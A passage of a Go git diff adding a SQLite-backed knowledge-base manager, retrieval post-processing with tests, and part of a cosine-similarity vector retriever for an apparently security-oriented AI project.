totalItems, nil +} + +// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项) +// limit: 每页分类数量(0表示不限制) +// offset: 偏移量(按分类偏移) +func (m *Manager) GetCategoriesWithItems(limit, offset int) ([]*CategoryWithItems, int, error) { + // 首先获取所有分类(带数量统计) + rows, err := m.db.Query(` + SELECT category, COUNT(*) as item_count + FROM knowledge_base_items + GROUP BY category + ORDER BY category + `) + if err != nil { + return nil, 0, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() 
+ + // 收集所有分类信息 + type categoryInfo struct { + name string + itemCount int + } + var allCategories []categoryInfo + for rows.Next() { + var info categoryInfo + if err := rows.Scan(&info.name, &info.itemCount); err != nil { + return nil, 0, fmt.Errorf("扫描分类失败: %w", err) + } + allCategories = append(allCategories, info) + } + + totalCategories := len(allCategories) + + // 应用分页(按分类分页) + var paginatedCategories []categoryInfo + if limit > 0 { + start := offset + end := offset + limit + if start >= totalCategories { + paginatedCategories = []categoryInfo{} + } else { + if end > totalCategories { + end = totalCategories + } + paginatedCategories = allCategories[start:end] + } + } else { + paginatedCategories = allCategories + } + + // 为每个分类获取其下的知识项(只返回摘要,不包含完整内容) + result := make([]*CategoryWithItems, 0, len(paginatedCategories)) + for _, catInfo := range paginatedCategories { + // 获取该分类下的所有知识项 + items, _, err := m.GetItemsSummary(catInfo.name, 0, 0) + if err != nil { + return nil, 0, fmt.Errorf("获取分类 %s 的知识项失败: %w", catInfo.name, err) + } + + result = append(result, &CategoryWithItems{ + Category: catInfo.name, + ItemCount: catInfo.itemCount, + Items: items, + }) + } + + return result, totalCategories, nil +} + +// GetItems 获取知识项列表(完整内容,用于向后兼容) +func (m *Manager) GetItems(category string) ([]*KnowledgeItem, error) { + return m.GetItemsWithOptions(category, 0, 0, true) +} + +// GetItemsWithOptions 获取知识项列表(支持分页和可选内容) +// category: 分类筛选(空字符串表示所有分类) +// limit: 每页数量(0表示不限制) +// offset: 偏移量 +// includeContent: 是否包含完整内容(false时只返回摘要) +func (m *Manager) GetItemsWithOptions(category string, limit, offset int, includeContent bool) ([]*KnowledgeItem, error) { + var rows *sql.Rows + var err error + + // 构建SQL查询 + var query string + var args []interface{} + + if includeContent { + query = "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items" + } else { + query = "SELECT id, category, title, file_path, created_at, updated_at FROM 
knowledge_base_items" + } + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItem + for rows.Next() { + item := &KnowledgeItem{} + var createdAt, updatedAt string + + if includeContent { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + } else { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + // 不包含内容时,Content为空字符串 + item.Content = "" + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsCount 获取知识项总数 +func (m *Manager) GetItemsCount(category string) (int, error) { + var count int + var err error + + if category != "" { + err = 
m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items WHERE category = ?", category).Scan(&count) + } else { + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&count) + } + + if err != nil { + return 0, fmt.Errorf("查询知识项总数失败: %w", err) + } + + return count, nil +} + +// SearchItemsByKeyword 按关键字搜索知识项(在所有数据中搜索,支持标题、分类、路径、内容匹配) +func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*KnowledgeItemSummary, error) { + if keyword == "" { + return nil, fmt.Errorf("搜索关键字不能为空") + } + + // 构建SQL查询,使用LIKE进行关键字匹配(不区分大小写) + var query string + var args []interface{} + + // SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数 + // 使用%keyword%进行模糊匹配 + searchPattern := "%" + keyword + "%" + + query = ` + SELECT id, category, title, file_path, created_at, updated_at + FROM knowledge_base_items + WHERE (LOWER(title) LIKE LOWER(?) OR LOWER(category) LIKE LOWER(?) OR LOWER(file_path) LIKE LOWER(?) OR LOWER(content) LIKE LOWER(?)) + ` + args = append(args, searchPattern, searchPattern, searchPattern, searchPattern) + + // 如果指定了分类,添加分类过滤 + if category != "" { + query += " AND category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + rows, err := m.db.Query(query, args...) 
+ if err != nil { + return nil, fmt.Errorf("搜索知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsSummary 获取知识项摘要列表(不包含完整内容,支持分页) +func (m *Manager) GetItemsSummary(category string, limit, offset int) ([]*KnowledgeItemSummary, int, error) { + // 获取总数 + total, err := m.GetItemsCount(category) + if err != nil { + return nil, 0, err + } + + // 获取列表数据(不包含内容) + var rows *sql.Rows + var query string + var args []interface{} + + query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items" + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) 
+ if err != nil { + return nil, 0, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, 0, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, total, nil +} + +// GetItem 获取单个知识项 +func (m *Manager) GetItem(id string) (*KnowledgeItem, error) { + item := &KnowledgeItem{} + var createdAt, updatedAt string + err := m.db.QueryRow( + "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items WHERE id = ?", + id, + ).Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt) + + if err == sql.ErrNoRows { + return nil, fmt.Errorf("知识项不存在") + } + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if 
createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + return item, nil +} + +// CreateItem 创建知识项 +func (m *Manager) CreateItem(category, title, content string) (*KnowledgeItem, error) { + id := uuid.New().String() + now := time.Now() + + // 构建文件路径 + filePath := filepath.Join(m.basePath, category, title+".md") + + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 写入文件 + if err := os.WriteFile(filePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 插入数据库 + _, err := m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, filePath, content, now, now, + ) + if err != nil { + return nil, fmt.Errorf("插入知识项失败: %w", err) + } + + return &KnowledgeItem{ + ID: id, + Category: category, + Title: title, + FilePath: filePath, + Content: content, + CreatedAt: now, + UpdatedAt: now, + }, nil +} + +// UpdateItem 更新知识项 +func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeItem, error) { + // 获取现有项 + item, err := m.GetItem(id) + if err != nil { + return nil, err + } + + // 构建新文件路径 + newFilePath := filepath.Join(m.basePath, category, title+".md") + + // 如果路径改变,需要移动文件 + if item.FilePath != newFilePath { + // 确保新目录存在 + if err := os.MkdirAll(filepath.Dir(newFilePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 移动文件 + if err := 
os.Rename(item.FilePath, newFilePath); err != nil { + return nil, fmt.Errorf("移动文件失败: %w", err) + } + + // 删除旧目录(如果为空) + oldDir := filepath.Dir(item.FilePath) + if isEmpty, _ := isEmptyDir(oldDir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if oldDir != m.basePath { + if err := os.Remove(oldDir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err)) + } + } + } + } + + // 写入文件 + if err := os.WriteFile(newFilePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 更新数据库 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, file_path = ?, content = ?, updated_at = ? WHERE id = ?", + category, title, newFilePath, content, time.Now(), id, + ) + if err != nil { + return nil, fmt.Errorf("更新知识项失败: %w", err) + } + + // 删除旧的向量嵌入(需要重新索引) + _, err = m.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", id) + if err != nil { + m.logger.Warn("删除旧向量嵌入失败", zap.Error(err)) + } + + return m.GetItem(id) +} + +// DeleteItem 删除知识项 +func (m *Manager) DeleteItem(id string) error { + // 获取文件路径 + var filePath string + err := m.db.QueryRow("SELECT file_path FROM knowledge_base_items WHERE id = ?", id).Scan(&filePath) + if err != nil { + return fmt.Errorf("查询知识项失败: %w", err) + } + + // 删除文件 + if err := os.Remove(filePath); err != nil && !os.IsNotExist(err) { + m.logger.Warn("删除文件失败", zap.String("path", filePath), zap.Error(err)) + } + + // 删除数据库记录(级联删除向量) + _, err = m.db.Exec("DELETE FROM knowledge_base_items WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除知识项失败: %w", err) + } + + // 删除空目录(如果为空) + dir := filepath.Dir(filePath) + if isEmpty, _ := isEmptyDir(dir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if dir != m.basePath { + if err := os.Remove(dir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err)) + } + } + } + + return nil +} + +// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 
开头的文件) +func isEmptyDir(dir string) (bool, error) { + entries, err := os.ReadDir(dir) + if err != nil { + return false, err + } + for _, entry := range entries { + // 忽略隐藏文件(以 . 开头) + if !strings.HasPrefix(entry.Name(), ".") { + return false, nil + } + } + return true, nil +} + +// LogRetrieval 记录检索日志 +func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error { + id := uuid.New().String() + itemsJSON, _ := json.Marshal(retrievedItems) + + _, err := m.db.Exec( + "INSERT INTO knowledge_retrieval_logs (id, conversation_id, message_id, query, risk_type, retrieved_items, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, conversationID, messageID, query, riskType, string(itemsJSON), time.Now(), + ) + return err +} + +// GetIndexStatus 获取索引状态 +func (m *Manager) GetIndexStatus() (map[string]interface{}, error) { + // 获取总知识项数 + var totalItems int + err := m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return nil, fmt.Errorf("查询总知识项数失败: %w", err) + } + + // 获取已索引的知识项数(有向量嵌入的) + var indexedItems int + err = m.db.QueryRow(` + SELECT COUNT(DISTINCT item_id) + FROM knowledge_embeddings + `).Scan(&indexedItems) + if err != nil { + return nil, fmt.Errorf("查询已索引项数失败: %w", err) + } + + // 计算进度百分比 + var progressPercent float64 + if totalItems > 0 { + progressPercent = float64(indexedItems) / float64(totalItems) * 100 + } else { + progressPercent = 100.0 + } + + // 判断是否完成 + isComplete := indexedItems >= totalItems && totalItems > 0 + + return map[string]interface{}{ + "total_items": totalItems, + "indexed_items": indexedItems, + "progress_percent": progressPercent, + "is_complete": isComplete, + }, nil +} + +// GetRetrievalLogs 获取检索日志 +func (m *Manager) GetRetrievalLogs(conversationID, messageID string, limit int) ([]*RetrievalLog, error) { + var rows *sql.Rows + var err error + + if messageID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, 
risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE message_id = ? ORDER BY created_at DESC LIMIT ?", + messageID, limit, + ) + } else if conversationID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE conversation_id = ? ORDER BY created_at DESC LIMIT ?", + conversationID, limit, + ) + } else { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs ORDER BY created_at DESC LIMIT ?", + limit, + ) + } + + if err != nil { + return nil, fmt.Errorf("查询检索日志失败: %w", err) + } + defer rows.Close() + + var logs []*RetrievalLog + for rows.Next() { + log := &RetrievalLog{} + var createdAt string + var itemsJSON sql.NullString + if err := rows.Scan(&log.ID, &log.ConversationID, &log.MessageID, &log.Query, &log.RiskType, &itemsJSON, &createdAt); err != nil { + return nil, fmt.Errorf("扫描检索日志失败: %w", err) + } + + // 解析时间 - 支持多种格式 + var err error + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + for _, format := range timeFormats { + log.CreatedAt, err = time.Parse(format, createdAt) + if err == nil && !log.CreatedAt.IsZero() { + break + } + } + + // 如果所有格式都失败,记录警告但继续处理 + if log.CreatedAt.IsZero() { + m.logger.Warn("解析检索日志时间失败", + zap.String("timeStr", createdAt), + zap.Error(err), + ) + // 使用当前时间作为fallback + log.CreatedAt = time.Now() + } + + // 解析检索项 + if itemsJSON.Valid { + json.Unmarshal([]byte(itemsJSON.String), &log.RetrievedItems) + } + + logs = append(logs, log) + } + + return logs, nil +} + +// DeleteRetrievalLog 删除检索日志 +func (m *Manager) DeleteRetrievalLog(id string) error { + result, err := m.db.Exec("DELETE FROM knowledge_retrieval_logs WHERE id = ?", id) + if err 
!= nil { + return fmt.Errorf("删除检索日志失败: %w", err) + } + + rowsAffected, err := result.RowsAffected() + if err != nil { + return fmt.Errorf("获取删除行数失败: %w", err) + } + + if rowsAffected == 0 { + return fmt.Errorf("检索日志不存在") + } + + return nil +} diff --git a/knowledge/retrieval_postprocess.go b/knowledge/retrieval_postprocess.go new file mode 100644 index 00000000..eb69e4c3 --- /dev/null +++ b/knowledge/retrieval_postprocess.go @@ -0,0 +1,213 @@ +package knowledge + +import ( + "context" + "crypto/sha256" + "encoding/hex" + "fmt" + "strings" + "sync" + "unicode" + "unicode/utf8" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" + "github.com/pkoukk/tiktoken-go" +) + +// postRetrieveMaxPrefetchCap 限制单次向量候选上限,避免误配置导致全表扫压力过大。 +const postRetrieveMaxPrefetchCap = 200 + +// DocumentReranker 可选重排(如交叉编码器 / 第三方 Rerank API),由 [Retriever.SetDocumentReranker] 注入;失败时在适配层降级为向量序。 +type DocumentReranker interface { + Rerank(ctx context.Context, query string, docs []*schema.Document) ([]*schema.Document, error) +} + +// NopDocumentReranker 占位实现,便于测试或未启用重排时显式注入。 +type NopDocumentReranker struct{} + +// Rerank implements [DocumentReranker] as no-op. 
+func (NopDocumentReranker) Rerank(_ context.Context, _ string, docs []*schema.Document) ([]*schema.Document, error) { + return docs, nil +} + +var tiktokenEncMu sync.Mutex +var tiktokenEncCache = map[string]*tiktoken.Tiktoken{} + +func encodingForTokenizerModel(model string) (*tiktoken.Tiktoken, error) { + m := strings.TrimSpace(model) + if m == "" { + m = "gpt-4" + } + tiktokenEncMu.Lock() + defer tiktokenEncMu.Unlock() + if enc, ok := tiktokenEncCache[m]; ok { + return enc, nil + } + enc, err := tiktoken.EncodingForModel(m) + if err != nil { + enc, err = tiktoken.GetEncoding("cl100k_base") + if err != nil { + return nil, err + } + } + tiktokenEncCache[m] = enc + return enc, nil +} + +func countDocTokens(text, model string) (int, error) { + enc, err := encodingForTokenizerModel(model) + if err != nil { + return 0, err + } + toks := enc.Encode(text, nil, nil) + return len(toks), nil +} + +// normalizeContentFingerprintKey 去重键:trim + 空白折叠(不改动大小写,避免合并仅大小写不同的代码片段)。 +func normalizeContentFingerprintKey(s string) string { + s = strings.TrimSpace(s) + var b strings.Builder + b.Grow(len(s)) + prevSpace := false + for _, r := range s { + if unicode.IsSpace(r) { + if !prevSpace { + b.WriteByte(' ') + prevSpace = true + } + continue + } + prevSpace = false + b.WriteRune(r) + } + return b.String() +} + +func contentNormKey(d *schema.Document) string { + if d == nil { + return "" + } + n := normalizeContentFingerprintKey(d.Content) + if n == "" { + return "" + } + sum := sha256.Sum256([]byte(n)) + return hex.EncodeToString(sum[:]) +} + +// dedupeByNormalizedContent 按规范化正文去重,保留向量检索顺序中首次出现的文档(同正文仅保留一条)。 +func dedupeByNormalizedContent(docs []*schema.Document) []*schema.Document { + if len(docs) < 2 { + return docs + } + seen := make(map[string]struct{}, len(docs)) + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil { + continue + } + k := contentNormKey(d) + if k == "" { + out = append(out, d) + continue + } + if _, ok := seen[k]; ok { + 
continue + } + seen[k] = struct{}{} + out = append(out, d) + } + return out +} + +// truncateDocumentsByBudget 按检索顺序整段保留文档,直至字符数或 token 数(任一启用)超限则停止。 +func truncateDocumentsByBudget(docs []*schema.Document, maxRunes, maxTokens int, tokenModel string) ([]*schema.Document, error) { + if len(docs) == 0 { + return docs, nil + } + unlimitedChars := maxRunes <= 0 + unlimitedTok := maxTokens <= 0 + if unlimitedChars && unlimitedTok { + return docs, nil + } + + remRunes := maxRunes + remTok := maxTokens + out := make([]*schema.Document, 0, len(docs)) + + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + runes := utf8.RuneCountInString(d.Content) + if !unlimitedChars && runes > remRunes { + break + } + var tok int + var err error + if !unlimitedTok { + tok, err = countDocTokens(d.Content, tokenModel) + if err != nil { + return nil, fmt.Errorf("token count: %w", err) + } + if tok > remTok { + break + } + } + out = append(out, d) + if !unlimitedChars { + remRunes -= runes + } + if !unlimitedTok { + remTok -= tok + } + } + return out, nil +} + +// EffectivePrefetchTopK 计算向量检索应拉取的候选条数(供粗排 / 去重 / 重排)。 +func EffectivePrefetchTopK(topK int, po *config.PostRetrieveConfig) int { + if topK < 1 { + topK = 5 + } + fetch := topK + if po != nil && po.PrefetchTopK > fetch { + fetch = po.PrefetchTopK + } + if fetch > postRetrieveMaxPrefetchCap { + fetch = postRetrieveMaxPrefetchCap + } + return fetch +} + +// ApplyPostRetrieve 检索后处理:规范化正文去重 → 预算截断 → 最终 TopK。重排在 [VectorEinoRetriever] 中单独调用以便失败时降级。 +func ApplyPostRetrieve(docs []*schema.Document, po *config.PostRetrieveConfig, tokenModel string, finalTopK int) ([]*schema.Document, error) { + if finalTopK < 1 { + finalTopK = 5 + } + if len(docs) == 0 { + return docs, nil + } + + maxChars := 0 + maxTok := 0 + if po != nil { + maxChars = po.MaxContextChars + maxTok = po.MaxContextTokens + } + + out := dedupeByNormalizedContent(docs) + + var err error + out, err = truncateDocumentsByBudget(out, 
maxChars, maxTok, tokenModel) + if err != nil { + return nil, err + } + + if len(out) > finalTopK { + out = out[:finalTopK] + } + return out, nil +} diff --git a/knowledge/retrieval_postprocess_test.go b/knowledge/retrieval_postprocess_test.go new file mode 100644 index 00000000..10c661a8 --- /dev/null +++ b/knowledge/retrieval_postprocess_test.go @@ -0,0 +1,62 @@ +package knowledge + +import ( + "testing" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" +) + +func doc(id, content string, score float64) *schema.Document { + d := &schema.Document{ID: id, Content: content, MetaData: map[string]any{metaKBItemID: "it1"}} + d.WithScore(score) + return d +} + +func TestDedupeByNormalizedContent(t *testing.T) { + a := doc("1", "hello world", 0.9) + b := doc("2", "hello world", 0.8) + c := doc("3", "other", 0.7) + out := dedupeByNormalizedContent([]*schema.Document{a, b, c}) + if len(out) != 2 { + t.Fatalf("len=%d want 2", len(out)) + } + if out[0].ID != "1" || out[1].ID != "3" { + t.Fatalf("order/ids wrong: %#v", out) + } +} + +func TestEffectivePrefetchTopK(t *testing.T) { + if g := EffectivePrefetchTopK(5, nil); g != 5 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 50}); g != 50 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 9999}); g != postRetrieveMaxPrefetchCap { + t.Fatalf("cap: got %d", g) + } +} + +func TestApplyPostRetrieveTruncateAndTopK(t *testing.T) { + d1 := doc("1", "ab", 0.9) + d2 := doc("2", "cd", 0.8) + d3 := doc("3", "ef", 0.7) + po := &config.PostRetrieveConfig{MaxContextChars: 3} + out, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, po, "gpt-4", 5) + if err != nil { + t.Fatal(err) + } + if len(out) != 1 || out[0].ID != "1" { + t.Fatalf("got %#v", out) + } + + out2, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, nil, "gpt-4", 2) + if err != nil { + t.Fatal(err) + } + if len(out2) != 2 { + 
t.Fatalf("topk: len=%d", len(out2)) + } +} diff --git a/knowledge/retriever.go b/knowledge/retriever.go new file mode 100644 index 00000000..9145b2c6 --- /dev/null +++ b/knowledge/retriever.go @@ -0,0 +1,305 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "math" + "sort" + "strings" + "sync" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Retriever 检索器:SQLite 存向量 + Eino 嵌入,**纯向量检索**(余弦相似度、TopK、阈值), +// 实现语义与 [retriever.Retriever] 适配层 [VectorEinoRetriever] 一致。 +type Retriever struct { + db *sql.DB + embedder *Embedder + config *RetrievalConfig + logger *zap.Logger + + rerankMu sync.RWMutex + reranker DocumentReranker +} + +// RetrievalConfig 检索配置 +type RetrievalConfig struct { + TopK int + SimilarityThreshold float64 + // SubIndexFilter 非空时仅检索 sub_indexes 包含该标签(逗号分隔之一)的行;空 sub_indexes 的旧行仍保留以兼容。 + SubIndexFilter string + PostRetrieve config.PostRetrieveConfig +} + +// NewRetriever 创建新的检索器 +func NewRetriever(db *sql.DB, embedder *Embedder, config *RetrievalConfig, logger *zap.Logger) *Retriever { + return &Retriever{ + db: db, + embedder: embedder, + config: config, + logger: logger, + } +} + +// UpdateConfig 更新检索配置 +func (r *Retriever) UpdateConfig(cfg *RetrievalConfig) { + if cfg != nil { + r.config = cfg + if r.logger != nil { + r.logger.Info("检索器配置已更新", + zap.Int("top_k", cfg.TopK), + zap.Float64("similarity_threshold", cfg.SimilarityThreshold), + zap.String("sub_index_filter", cfg.SubIndexFilter), + zap.Int("post_retrieve_prefetch_top_k", cfg.PostRetrieve.PrefetchTopK), + zap.Int("post_retrieve_max_context_chars", cfg.PostRetrieve.MaxContextChars), + zap.Int("post_retrieve_max_context_tokens", cfg.PostRetrieve.MaxContextTokens), + ) + } + } +} + +// SetDocumentReranker 注入可选重排器(并发安全);nil 表示禁用。 +func (r *Retriever) SetDocumentReranker(rr DocumentReranker) { + if r == nil { + return + } + r.rerankMu.Lock() + defer 
// cosineSimilarity returns the cosine of the angle between a and b.
//
// It returns 0 when the vectors differ in length, when either is empty, or
// when either has zero magnitude. Each component is widened to float64 before
// multiplying, so products of large float32 values do not overflow to +Inf
// and products of very small values do not underflow to zero.
func cosineSimilarity(a, b []float32) float64 {
	if len(a) != len(b) {
		return 0.0
	}

	var dotProduct, normA, normB float64
	for i, av := range a {
		x, y := float64(av), float64(b[i])
		dotProduct += x * y
		normA += x * x
		normB += y * y
	}

	if normA == 0 || normB == 0 {
		return 0.0
	}

	return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB))
}
+} + +func (r *Retriever) knowledgeEmbeddingSelectSQL(riskType, subIndexFilter string) (string, []interface{}) { + q := `SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, e.embedding_model, e.embedding_dim, i.category, i.title +FROM knowledge_embeddings e +JOIN knowledge_base_items i ON e.item_id = i.id +WHERE 1=1` + var args []interface{} + if strings.TrimSpace(riskType) != "" { + q += ` AND TRIM(i.category) = TRIM(?) COLLATE NOCASE` + args = append(args, riskType) + } + if tag := strings.TrimSpace(subIndexFilter); tag != "" { + tag = strings.ToLower(strings.ReplaceAll(tag, " ", "")) + q += ` AND (TRIM(COALESCE(e.sub_indexes,'')) = '' OR INSTR(',' || LOWER(REPLACE(e.sub_indexes,' ','')) || ',', ',' || ? || ',') > 0)` + args = append(args, tag) + } + return q, args +} + +// vectorSearch 纯向量检索:余弦相似度排序,按相似度阈值与 TopK 截断(无 BM25、无混合分、无邻块扩展)。 +func (r *Retriever) vectorSearch(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) { + if req.Query == "" { + return nil, fmt.Errorf("查询不能为空") + } + + topK := req.TopK + if topK <= 0 && r.config != nil { + topK = r.config.TopK + } + if topK <= 0 { + topK = 5 + } + + threshold := req.Threshold + if threshold <= 0 && r.config != nil { + threshold = r.config.SimilarityThreshold + } + if threshold <= 0 { + threshold = 0.7 + } + + subIdxFilter := strings.TrimSpace(req.SubIndexFilter) + if subIdxFilter == "" && r.config != nil { + subIdxFilter = strings.TrimSpace(r.config.SubIndexFilter) + } + + queryText := FormatQueryEmbeddingText(req.RiskType, req.Query) + queryEmbedding, err := r.embedder.EmbedText(ctx, queryText) + if err != nil { + return nil, fmt.Errorf("向量化查询失败: %w", err) + } + queryDim := len(queryEmbedding) + expectedModel := "" + if r.embedder != nil { + expectedModel = r.embedder.EmbeddingModelName() + } + + sqlStr, sqlArgs := r.knowledgeEmbeddingSelectSQL(strings.TrimSpace(req.RiskType), subIdxFilter) + rows, err := r.db.QueryContext(ctx, sqlStr, sqlArgs...) 
